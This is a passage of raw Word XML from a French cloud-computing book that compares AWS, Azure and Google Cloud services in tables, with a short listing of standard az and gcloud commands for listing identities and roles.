        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Virtual Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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VPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Machine virtuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EC2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Virtual Machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compute Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Conteneurs managés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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ECS / EKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Container Apps / AKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Cloud Run / GKE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lambda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Stockage objet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Blob Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Cloud Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base relationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>RDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Azure SQL / Flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Supervision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CloudWatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Azure Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Cloud Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="84" name="Picture 84"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f82.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.82 — Trois façons de nommer la même brique</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ÉQUIVALENCE FONCTIONNELLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Deux services qui rendent le même service conceptuel avec des garanties différentes. Une migration ne consiste jamais à remplacer un nom par un autre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>72.2 Identité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'identité est le premier service à comprendre, car tout le reste en dépend. Azure s'appuie sur un annuaire d'entreprise, Google Cloud sur des comptes et des rôles projet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.267 — Cinq aspects de l'identité</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213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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Google Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annuaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entra ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud Identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Unité de permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Politique JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Rôle RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Rôle IAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compte, ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Abonnement, groupe, ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Organisation, projet, ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Identité de charge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Rôle IAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Identité managée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="237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Compte de service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fédération</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>OIDC / SAML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entra ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2372"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Workload Identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux séries de commandes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Azure : se connecter et lister les rôles d'un périmètre</w:t>
        <w:br/>
        <w:t>az login</w:t>
        <w:br/>
        <w:t>az account list --output table</w:t>
        <w:br/>
        <w:t>az role assignment list --assignee alice@exemple.fr --all --output table</w:t>
        <w:br/>
        <w:br/>
        <w:t># Google Cloud : identité active et rôles projet</w:t>
        <w:br/>
        <w:t>gcloud auth login</w:t>
        <w:br/>
        <w:t>gcloud config list</w:t>
        <w:br/>
        <w:t>gcloud projects get-iam-policy mon-projet \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --flatten="bindings[].members" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --format="table(bindings.role, bindings.members)"</w:t>
      </w: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LES IDENTITÉS MANAGÉES REMPLACENT LES SECRETS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Azure Managed Identity et Google Workload Identity fournissent des identifiants temporaires à une charge de travail. Le code n'a plus de mot de passe de base de données ni de clé de stockage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>72.3 Calcul</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le choix se fait sur trois critères : le modèle d'exécution, le besoin de contrôle et la familiarité de l'équipe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.268 — Cinq besoins de calcul</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250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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="212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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
